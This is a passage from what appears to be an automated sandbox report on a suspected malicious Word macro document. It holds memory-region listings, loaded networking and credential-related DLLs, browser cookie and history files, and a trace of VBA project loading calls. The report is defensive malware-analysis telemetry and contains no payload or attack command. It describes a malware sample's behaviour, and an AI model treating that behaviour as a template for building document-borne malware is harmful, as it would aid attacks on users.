0xaf73fff entry_point = 0x0 region_type = private name = "private_0x000000000af70000" filename = "" Region: id = 588 start_va = 0xaf80000 end_va = 0xaf83fff entry_point = 0x0 region_type = private name = "private_0x000000000af80000" filename = "" Region: id = 589 start_va = 0xaf90000 end_va = 0xaf93fff entry_point = 0x0 region_type = private name = "private_0x000000000af90000" filename = "" Region: id = 590 start_va = 0xafa0000 end_va = 0xafa2fff entry_point = 0x0 region_type = private name = "private_0x000000000afa0000" filename = "" Region: id = 591 start_va = 0xafb0000 end_va = 0xafb3fff entry_point = 0x0 region_type = private name = "private_0x000000000afb0000" filename = "" Region: id = 592 start_va = 0xafc0000 end_va = 0xafc3fff entry_point = 0x0 region_type = private name = "private_0x000000000afc0000" filename = "" Region: id = 593 start_va = 0xafd0000 end_va = 0xafd3fff entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 594 start_va = 0xafe0000 end_va = 0xafe3fff entry_point = 0x0 region_type = private name = "private_0x000000000afe0000" filename = "" Region: id = 595 start_va = 0xaff0000 end_va = 0xaff3fff entry_point = 0x0 region_type = private name = "private_0x000000000aff0000" filename = "" Region: id = 596 start_va = 0xb000000 end_va = 0xb003fff entry_point = 0x0 region_type = private name = "private_0x000000000b000000" filename = "" Region: id = 597 start_va = 0xb010000 end_va = 0xb012fff entry_point = 0x0 region_type = private name = "private_0x000000000b010000" filename = "" Region: id = 598 start_va = 0xb020000 end_va = 0xb023fff entry_point = 0x0 region_type = private name = "private_0x000000000b020000" filename = "" Region: id = 599 start_va = 0xb030000 end_va = 0xb033fff entry_point = 0x0 region_type = private name = "private_0x000000000b030000" filename = "" Region: id = 600 start_va = 0xb040000 end_va = 0xb043fff entry_point = 0x0 region_type = private name = "private_0x000000000b040000" filename = "" Region: id = 601 start_va = 0xb050000 end_va = 0xb053fff entry_point = 0x0 region_type = private name = "private_0x000000000b050000" filename = "" Region: id = 602 start_va = 0xb060000 end_va = 0xb063fff entry_point = 0x0 region_type = private name = "private_0x000000000b060000" filename = "" Region: id = 603 start_va = 0xb070000 end_va = 0xb073fff entry_point = 0x0 region_type = private name = "private_0x000000000b070000" filename = "" Region: id = 604 start_va = 0xb080000 end_va = 0xb082fff entry_point = 0x0 region_type = private name = "private_0x000000000b080000" filename = "" Region: id = 605 start_va = 0xb090000 end_va = 0xb093fff entry_point = 0x0 region_type = private name = "private_0x000000000b090000" filename = "" Region: id = 606 start_va = 0xb0a0000 end_va = 0xb0a3fff entry_point = 0x0 region_type = private name = "private_0x000000000b0a0000" filename = "" Region: id = 607 start_va = 0xb0b0000 end_va = 0xb0b3fff entry_point = 0x0 region_type = private name = "private_0x000000000b0b0000" filename = "" Region: id = 608 start_va = 0xb0c0000 end_va = 0xb0c3fff entry_point = 0x0 region_type = private name = "private_0x000000000b0c0000" filename = "" Region: id = 609 start_va = 0xb0d0000 end_va = 0xb0d3fff entry_point = 0x0 region_type = private name = "private_0x000000000b0d0000" filename = "" Region: id = 610 start_va = 0xb0e0000 end_va = 0xb0e3fff entry_point = 0x0 region_type = private name = "private_0x000000000b0e0000" filename = "" Region: id = 611 start_va = 0xb0f0000 end_va = 0xb0f3fff entry_point = 0x0 region_type = private name = "private_0x000000000b0f0000" filename = "" Region: id = 612 start_va = 0xb100000 end_va = 0xb103fff entry_point = 0x0 region_type = private name = "private_0x000000000b100000" filename = "" Region: id = 613 start_va = 0xb110000 end_va = 0xb113fff entry_point = 0x0 region_type = private name = "private_0x000000000b110000" filename = "" Region: id = 614 start_va = 0xb120000 end_va = 0xb123fff entry_point = 0x0 region_type = private name = "private_0x000000000b120000" filename = "" Region: id = 615 start_va = 0xb130000 end_va = 0xb133fff entry_point = 0x0 region_type = private name = "private_0x000000000b130000" filename = "" Region: id = 616 start_va = 0xb140000 end_va = 0xb142fff entry_point = 0x0 region_type = private name = "private_0x000000000b140000" filename = "" Region: id = 617 start_va = 0xb150000 end_va = 0xb153fff entry_point = 0x0 region_type = private name = "private_0x000000000b150000" filename = "" Region: id = 618 start_va = 0xb160000 end_va = 0xb163fff entry_point = 0x0 region_type = private name = "private_0x000000000b160000" filename = "" Region: id = 619 start_va = 0xb170000 end_va = 0xb173fff entry_point = 0x0 region_type = private name = "private_0x000000000b170000" filename = "" Region: id = 688 start_va = 0xb310000 end_va = 0xbb0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b310000" filename = "" Region: id = 689 start_va = 0xbb10000 end_va = 0xc30ffff entry_point = 0x0 region_type = private name = "private_0x000000000bb10000" filename = "" Region: id = 690 start_va = 0x74c90000 end_va = 0x74ccafff entry_point = 0x74ca56aa region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msproof7.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msproof7.dll") Region: id = 725 start_va = 0x8e40000 end_va = 0x8fc2fff entry_point = 0x0 region_type = private name = "private_0x0000000008e40000" filename = "" Region: id = 726 start_va = 0x8fd0000 end_va = 0x9152fff entry_point = 0x0 region_type = private name = "private_0x0000000008fd0000" filename = "" Region: id = 727 start_va = 0xa140000 end_va = 0xa1eafff entry_point = 0xa140000 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 728 start_va = 0xa1f0000 end_va = 0xa1f1fff entry_point = 0x0 region_type = private name = "private_0x000000000a1f0000" filename = "" Region: id = 729 start_va = 0xa210000 end_va = 0xa211fff entry_point = 0x0 region_type = private name = "private_0x000000000a210000" filename = "" Region: id = 730 start_va = 0xa230000 end_va = 0xa231fff entry_point = 0x0 region_type = private name = "private_0x000000000a230000" filename = "" Region: id = 731 start_va = 0xa400000 end_va = 0xa7bffff entry_point = 0x0 region_type = private name = "private_0x000000000a400000" filename = "" Region: id = 732 start_va = 0xa7c0000 end_va = 0xa861fff entry_point = 0xa7c0000 region_type = mapped_file name = "timesi.ttf" filename = "\\Windows\\Fonts\\timesi.ttf" (normalized: "c:\\windows\\fonts\\timesi.ttf") Region: id = 733 start_va = 0xa880000 end_va = 0xa881fff entry_point = 0x0 region_type = private name = "private_0x000000000a880000" filename = "" Region: id = 734 start_va = 0xa8a0000 end_va = 0xa8a1fff entry_point = 0x0 region_type = private name = "private_0x000000000a8a0000" filename = "" Region: id = 735 start_va = 0xb180000 end_va = 0xb24dfff entry_point = 0xb180000 region_type = mapped_file name = "timesbd.ttf" filename = "\\Windows\\Fonts\\timesbd.ttf" (normalized: "c:\\windows\\fonts\\timesbd.ttf") Region: id = 736 start_va = 0xb250000 end_va = 0xb309fff entry_point = 0xb250000 region_type = mapped_file name = "calibril.ttf" filename = "\\Windows\\Fonts\\CalibriL.ttf" (normalized: "c:\\windows\\fonts\\calibril.ttf") Region: id = 737 start_va = 0xc310000 end_va = 0xc40ffff entry_point = 0x0 region_type = private name = "private_0x000000000c310000" filename = "" Region: id = 738 start_va = 0xc410000 end_va = 0xc411fff entry_point = 0x0 region_type = private name = "private_0x000000000c410000" filename = "" Region: id = 739 start_va = 0xc430000 end_va = 0xc431fff entry_point = 0x0 region_type = private name = "private_0x000000000c430000" filename = "" Region: id = 740 start_va = 0xc450000 end_va = 0xc451fff entry_point = 0x0 region_type = private name = "private_0x000000000c450000" filename = "" Region: id = 741 start_va = 0xc470000 end_va = 0xc471fff entry_point = 0x0 region_type = private name = "private_0x000000000c470000" filename = "" Region: id = 742 start_va = 0xc480000 end_va = 0xc558fff entry_point = 0x0 region_type = private name = "private_0x000000000c480000" filename = "" Region: id = 743 start_va = 0xc5f0000 end_va = 0xc62ffff entry_point = 0x0 region_type = private name = "private_0x000000000c5f0000" filename = "" Region: id = 744 start_va = 0xc7d0000 end_va = 0xc8cffff entry_point = 0x0 region_type = private name = "private_0x000000000c7d0000" filename = "" Region: id = 745 start_va = 0x66910000 end_va = 0x66942fff entry_point = 0x669111e6 region_type = mapped_file name = "windowscodecsext.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecsExt.dll" (normalized: "c:\\windows\\syswow64\\windowscodecsext.dll") Region: id = 746 start_va = 0x7ef5d000 end_va = 0x7ef5ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef5d000" filename = "" Region: id = 751 start_va = 0x3b80000 end_va = 0x3b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 752 start_va = 0x667f0000 end_va = 0x66868fff entry_point = 0x667f140f region_type = mapped_file name = "mscms.dll" filename = "\\Windows\\SysWOW64\\mscms.dll" (normalized: "c:\\windows\\syswow64\\mscms.dll") Region: id = 1025 start_va = 0x3c20000 end_va = 0x3c20fff entry_point = 0x0 region_type = private name = "private_0x0000000003c20000" filename = "" Region: id = 1026 start_va = 0x9160000 end_va = 0x92e5fff entry_point = 0x0 region_type = private name = "private_0x0000000009160000" filename = "" Region: id = 1027 start_va = 0x74c80000 end_va = 0x74c86fff entry_point = 0x74c8128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1028 start_va = 0x74cd0000 end_va = 0x74cebfff entry_point = 0x74cda431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1029 start_va = 0x67d30000 end_va = 0x67d3cfff entry_point = 0x67d32012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 1030 start_va = 0x66ee0000 end_va = 0x66ef1fff entry_point = 0x66ee3271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 1031 start_va = 0x66ed0000 end_va = 0x66ed7fff entry_point = 0x66ed34d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 1032 start_va = 0x66db0000 end_va = 0x66debfff entry_point = 0x66db145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1033 start_va = 0x66da0000 end_va = 0x66da4fff entry_point = 0x66da15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 1034 start_va = 0x66d90000 end_va = 0x66d95fff entry_point = 0x66d91673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 1035 start_va = 0x4b0000 end_va = 0x4b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 1036 start_va = 0x3600000 end_va = 0x3607fff entry_point = 0x3600000 region_type = mapped_file name = "index.dat" filename = "\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\hjrd1koky ds8lujv\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1037 start_va = 0x3610000 end_va = 0x3617fff entry_point = 0x3610000 region_type = mapped_file name = "index.dat" filename = "\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\hjrd1koky ds8lujv\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1038 start_va = 0x3620000 end_va = 0x362ffff entry_point = 0x3620000 region_type = mapped_file name = "index.dat" filename = "\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\hjrd1koky ds8lujv\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1039 start_va = 0xc8d0000 end_va = 0xcc12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c8d0000" filename = "" Region: id = 1040 start_va = 0x66d40000 end_va = 0x66d83fff entry_point = 0x66d563f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1041 start_va = 0x8f20000 end_va = 0x8f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000008f20000" filename = "" Region: id = 1042 start_va = 0x66cc0000 end_va = 0x66cd4fff entry_point = 0x66cc12de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 1043 start_va = 0x66ce0000 end_va = 0x66d31fff entry_point = 0x66ce14be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 1044 start_va = 0x66cb0000 end_va = 0x66cbcfff entry_point = 0x66cb1326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 1045 start_va = 0x6640000 end_va = 0x667ffff entry_point = 0x0 region_type = private name = "private_0x0000000006640000" filename = "" Region: id = 1046 start_va = 0xcd40000 end_va = 0xce3ffff entry_point = 0x0 region_type = private name = "private_0x000000000cd40000" filename = "" Region: id = 1047 start_va = 0x66ca0000 end_va = 0x66ca5fff entry_point = 0x66ca125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 1048 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 1049 start_va = 0x64c0000 end_va = 0x64cffff entry_point = 0x0 region_type = private name = "private_0x00000000064c0000" filename = "" Region: id = 1050 start_va = 0x66c90000 end_va = 0x66c95fff entry_point = 0x66c914b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1051 start_va = 0x3c60000 end_va = 0x3c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c60000" filename = "" Region: id = 1052 start_va = 0xcc30000 end_va = 0xcd2ffff entry_point = 0x0 region_type = private name = "private_0x000000000cc30000" filename = "" Region: id = 1053 start_va = 0x66c80000 end_va = 0x66c8ffff entry_point = 0x66c81526 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\SysWOW64\\NapiNSP.dll" (normalized: "c:\\windows\\syswow64\\napinsp.dll") Region: id = 1054 start_va = 0x7ef98000 end_va = 0x7ef9afff entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 1055 start_va = 0x66c60000 end_va = 0x66c71fff entry_point = 0x66c618f2 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\SysWOW64\\pnrpnsp.dll" (normalized: "c:\\windows\\syswow64\\pnrpnsp.dll") Region: id = 1056 start_va = 0x66c50000 end_va = 0x66c57fff entry_point = 0x66c5131e region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\SysWOW64\\winrnr.dll" (normalized: "c:\\windows\\syswow64\\winrnr.dll") Region: id = 1057 start_va = 0x66c10000 end_va = 0x66c47fff entry_point = 0x66c1990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1058 start_va = 0xc700000 end_va = 0xc73ffff entry_point = 0x0 region_type = private name = "private_0x000000000c700000" filename = "" Region: id = 1059 start_va = 0x66bd0000 end_va = 0x66c09fff entry_point = 0x66bd23dd region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 1060 start_va = 0x3b40000 end_va = 0x3b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b40000" filename = "" Region: id = 1061 start_va = 0xcf50000 end_va = 0xd04ffff entry_point = 0x0 region_type = private name = "private_0x000000000cf50000" filename = "" Region: id = 1062 start_va = 0x66b90000 end_va = 0x66bc7fff entry_point = 0x66b91489 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 1063 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1064 start_va = 0x64d0000 end_va = 0x650ffff entry_point = 0x0 region_type = private name = "private_0x00000000064d0000" filename = "" Region: id = 1065 start_va = 0x9830000 end_va = 0x992ffff entry_point = 0x0 region_type = private name = "private_0x0000000009830000" filename = "" Region: id = 1066 start_va = 0x66b70000 end_va = 0x66b85fff entry_point = 0x66b72061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 1067 start_va = 0x7ef95000 end_va = 0x7ef97fff entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 1068 start_va = 0x38c0000 end_va = 0x38fffff entry_point = 0x0 region_type = private name = "private_0x00000000038c0000" filename = "" Region: id = 1069 start_va = 0xd160000 end_va = 0xd25ffff entry_point = 0x0 region_type = private name = "private_0x000000000d160000" filename = "" Region: id = 1070 start_va = 0x66aa0000 end_va = 0x66b61fff entry_point = 0x66aa119a region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\SysWOW64\\webservices.dll" (normalized: "c:\\windows\\syswow64\\webservices.dll") Region: id = 1071 start_va = 0x7ef5a000 end_va = 0x7ef5cfff entry_point = 0x0 region_type = private name = "private_0x000000007ef5a000" filename = "" Region: id = 1072 start_va = 0x6510000 end_va = 0x65c6fff entry_point = 0x6510000 region_type = mapped_file name = "arialbd.ttf" filename = "\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf") Thread: id = 1 os_tid = 0xa50 Thread: id = 2 os_tid = 0xa44 Thread: id = 3 os_tid = 0xa40 Thread: id = 4 os_tid = 0xa3c Thread: id = 5 os_tid = 0xa34 Thread: id = 6 os_tid = 0xa24 Thread: id = 7 os_tid = 0xa20 Thread: id = 8 os_tid = 0xa18 Thread: id = 9 os_tid = 0x9ec Thread: id = 10 os_tid = 0x9e0 Thread: id = 11 os_tid = 0x9dc Thread: id = 12 os_tid = 0x9d8 Thread: id = 13 os_tid = 0x9d4 Thread: id = 14 os_tid = 0x9d0 Thread: id = 15 os_tid = 0x9cc Thread: id = 16 os_tid = 0x9c8 Thread: id = 17 os_tid = 0x9a8 Thread: id = 18 os_tid = 0x9a0 Thread: id = 19 os_tid = 0x998 Thread: id = 20 os_tid = 0x994 Thread: id = 21 os_tid = 0x978 [0056.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", cchWideChar=-1, lpMultiByteStr=0x348200, cbMultiByte=147, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", lpUsedDefaultChar=0x0) returned 74 [0057.970] NtdllDefWindowProc_A (hWnd=0x201ac, Msg=0x81, wParam=0x0, lParam=0x347ebc) returned 0x1 [0057.970] NtdllDefWindowProc_A (hWnd=0x201ac, Msg=0x83, wParam=0x0, lParam=0x347ea8) returned 0x0 [0057.971] NtdllDefWindowProc_A (hWnd=0x201ac, Msg=0x1, wParam=0x0, lParam=0x347ebc) returned 0x0 [0057.971] NtdllDefWindowProc_A (hWnd=0x201ac, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0057.971] NtdllDefWindowProc_A (hWnd=0x201ac, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0057.972] NtdllDefWindowProc_A (hWnd=0x201ac, Msg=0x46, wParam=0x0, lParam=0x348280) returned 0x0 [0057.972] NtdllDefWindowProc_A (hWnd=0x201ac, Msg=0x47, wParam=0x0, lParam=0x348280) returned 0x0 [0057.972] NtdllDefWindowProc_A (hWnd=0x201ac, Msg=0x3, wParam=0x0, lParam=0x1c202d0) returned 0x0 [0057.976] CRetailMalloc_Alloc () returned 0x77d3118 [0057.976] GetUserDefaultLCID () returned 0x409 [0058.020] CRetailMalloc_Alloc () returned 0x86eefe0 [0058.020] CRetailMalloc_Alloc () returned 0x880f840 [0058.020] CRetailMalloc_Alloc () returned 0x87fa628 [0058.020] CRetailMalloc_Alloc () returned 0x883d188 [0058.020] CRetailMalloc_Alloc () returned 0x87698b0 [0058.047] CRetailMalloc_Alloc () returned 0x77ce198 [0058.047] CRetailMalloc_Alloc () returned 0x880f7c8 [0058.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\HJRD1K~1\\Desktop\\dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc", cchWideChar=-1, lpMultiByteStr=0x3487c0, cbMultiByte=189, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\HJRD1K~1\\Desktop\\dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc", lpUsedDefaultChar=0x0) returned 95 [0058.359] CRetailMalloc_Alloc () returned 0x86e5558 [0058.373] CRetailMalloc_Alloc () returned 0x876ca68 [0058.373] CRetailMalloc_Alloc () returned 0x87eb638 [0058.374] CRetailMalloc_Alloc () returned 0x87a83a0 [0058.374] CRetailMalloc_Alloc () returned 0x884d500 [0058.374] CRetailMalloc_Alloc () returned 0x884da10 [0058.419] lstrcpyA (in: lpString1=0x6d02a10, lpString2="C:\\Users\\HJRD1K~1\\Desktop\\dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc" | out: lpString1="C:\\Users\\HJRD1K~1\\Desktop\\dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc") returned="C:\\Users\\HJRD1K~1\\Desktop\\dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc" [0058.419] lstrcpyA (in: lpString1=0x6d02a10, lpString2="C:\\Users\\HJRD1K~1\\Desktop\\dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc" | out: lpString1="C:\\Users\\HJRD1K~1\\Desktop\\dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc") returned="C:\\Users\\HJRD1K~1\\Desktop\\dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc" [0058.419] lstrcpyA (in: lpString1=0x6d02a10, lpString2="C:\\Users\\HJRD1K~1\\Desktop\\dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc" | out: lpString1="C:\\Users\\HJRD1K~1\\Desktop\\dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc") returned="C:\\Users\\HJRD1K~1\\Desktop\\dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc" [0058.420] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0058.420] wcscpy_s (in: _Destination=0x34844e, _SizeInWords=0x105, _Source="C:\\Users\\HJRD1K~1\\Desktop\\dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc" | out: _Destination="C:\\Users\\HJRD1K~1\\Desktop\\dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc") returned 0x0 [0058.420] CRetailMalloc_Alloc () returned 0x876c658 [0058.421] CRetailMalloc_Free () returned 0xec0001 [0058.421] CRetailMalloc_Realloc () returned 0x88497c8 [0058.421] wcscpy_s (in: _Destination=0x8849800, _SizeInWords=0x62, _Source="*\\CC:\\Users\\HJRD1K~1\\Desktop\\dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc" | out: _Destination="*\\CC:\\Users\\HJRD1K~1\\Desktop\\dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc") returned 0x0 [0058.421] CRetailMalloc_Alloc () returned 0x876c658 [0058.422] CRetailMalloc_Free () returned 0xec0001 [0058.422] wcscpy_s (in: _Destination=0x87a83b0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\HJRD1K~1\\Desktop\\dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc" | out: _Destination="*\\CC:\\Users\\HJRD1K~1\\Desktop\\dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc") returned 0x0 [0058.422] CExposedDocFile::OpenStorage () returned 0x0 [0058.423] CExposedDocFile::OpenStream () returned 0x0 [0058.517] CExposedStream::Release () returned 0x0 [0058.517] CExposedDocFile::OpenStream () returned 0x0 [0058.517] CExposedStream::Release () returned 0x0 [0058.518] CRetailMalloc_Alloc () returned 0x8841f10 [0058.518] wcscpy_s (in: _Destination=0x347fe8, _SizeInWords=0x40, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0058.518] _ltow_s (in: _Value=0, _Buffer=0x347ff4, _BufferCount=0x3a, _Radix=16 | out: _Buffer="0") returned 0x0 [0058.518] CExposedDocFile::OpenStream () returned 0x0 [0058.518] CRetailMalloc_Alloc () returned 0x884e988 [0058.518] CExposedStream::Read () returned 0x0 [0058.520] CExposedStream::Seek () returned 0x0 [0058.520] CRetailMalloc_Free () returned 0x1 [0058.520] CRetailMalloc_Free () returned 0x1360101 [0058.521] longjmp () [0058.549] CRetailMalloc_Alloc () returned 0x8841f10 [0058.550] CRetailMalloc_Realloc () returned 0x87cc040 [0058.550] CRetailMalloc_Alloc () returned 0x867bcf8 [0058.550] CRetailMalloc_Alloc () returned 0x867bc88 [0058.550] CRetailMalloc_Alloc () returned 0x884e700 [0058.550] CRetailMalloc_Realloc () returned 0x86eff10 [0058.550] CRetailMalloc_Alloc () returned 0x884e920 [0058.550] CRetailMalloc_Alloc () returned 0x884eb40 [0058.550] CRetailMalloc_Alloc () returned 0x88110a0 [0058.550] CRetailMalloc_Alloc () returned 0x87fbfc0 [0058.562] CRetailMalloc_Alloc () returned 0x87eb638 [0058.562] CRetailMalloc_Alloc () returned 0x86e5fb8 [0058.562] CRetailMalloc_Alloc () returned 0x87eb748 [0058.562] CRetailMalloc_Alloc () returned 0x8811000 [0058.562] CRetailMalloc_Alloc () returned 0x87eb7d0 [0058.562] CRetailMalloc_Realloc () returned 0x884ed60 [0058.562] CRetailMalloc_Alloc () returned 0x86e5f88 [0058.562] CRetailMalloc_Alloc () returned 0x86e5fa8 [0058.564] CRetailMalloc_Alloc () returned 0x87eb858 [0058.564] CRetailMalloc_Alloc () returned 0x78094e0 [0058.564] CRetailMalloc_Alloc () returned 0x884efe8 [0058.566] CRetailMalloc_Realloc () returned 0x8750020 [0058.571] CExposedDocFile::OpenStream () returned 0x0 [0058.571] CRetailMalloc_Alloc () returned 0x884fa18 [0058.571] CExposedStream::Read () returned 0x0 [0058.574] GetProcAddress (hModule=0x66f00000, lpProcName="_MsoMultiByteToWideChar@24") returned 0x66f0c669 [0058.577] CRetailMalloc_Alloc () returned 0x884fe38 [0058.578] CRetailMalloc_Free () returned 0x1 [0058.578] CRetailMalloc_Realloc () returned 0x8750140 [0058.600] CRetailMalloc_Realloc () returned 0x87ee120 [0058.600] SysStringLen (param_1="Word") returned 0x4 [0058.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0058.601] SysStringLen (param_1="Word") returned 0x4 [0058.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x61418fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0058.601] CRetailMalloc_Alloc () returned 0x86800a8 [0058.601] CRetailMalloc_Free () returned 0x1610001 [0058.601] CRetailMalloc_Realloc () returned 0x884fe38 [0058.602] CRetailMalloc_Alloc () returned 0x86800a8 [0058.602] CRetailMalloc_Free () returned 0x1610001 [0058.602] CRetailMalloc_Alloc () returned 0x876c658 [0058.602] CRetailMalloc_Free () returned 0xec0001 [0058.632] CRetailMalloc_Realloc () returned 0x88515b8 [0058.632] SysStringLen (param_1="VBA") returned 0x3 [0058.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0058.632] SysStringLen (param_1="VBA") returned 0x3 [0058.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 